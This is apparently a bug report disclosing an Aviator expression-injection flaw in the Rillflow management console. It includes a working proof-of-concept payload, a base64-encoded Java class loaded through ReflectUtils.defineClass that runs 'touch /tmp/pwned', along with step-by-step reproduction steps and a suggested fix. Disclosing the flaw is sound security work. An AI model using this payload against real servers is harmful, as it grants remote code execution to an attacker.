【bug report】Aviator Expression Injection Leading to RCE #102
Description
Summary
In the Rillflow management console, attackers can create a process list and set input mappings for nodes to process Aviator expressions, which can lead to Remote Code Execution (RCE). This allows them to escalate from a web user to gain machine privileges.
JDK17's rillfow payload
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));
Impact
Rillflow *
Proof of Concept1
1.Create a process list, click Create
- import demo file
version: 1.0.0
workspace: rillFlowSimple
dagName: greet
alias: release
type: flow
inputSchema: >-
[{"required":true,"name":"Bob","type":"String"},{"required":true,"name":"Alice","type":"String"}]
tasks:
- category: function
name: Bob
resourceName: http://sample-executor:8000/greet.json?user=Bob
pattern: task_sync
tolerance: false
next: Alice
inputMappings:
- source: "$.context.Bob"
target: "$.input.Bob"
- category: function
name: Alice
resourceName: http://sample-executor:8000/greet.json?user=Alice
pattern: task_sync
tolerance: false
inputMappings:
- source: "$.context.Alice"
target: "$.input.Alice"
- Click Bob Input payload
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));
Then victim will execute touch /tmp/pwned.
Then click ok
4. Click save then set alias name
-
Click next Step,click Submit
-
Click Test Run,Input some args,execute command
How to Fix It
When using Aviator, add relevant configurations to it to prohibit the loading of external classes.
https://www.yuque.com/boyan-avfmj/aviatorscript/yr1oau
Simply set the classes in the whitelist to empty.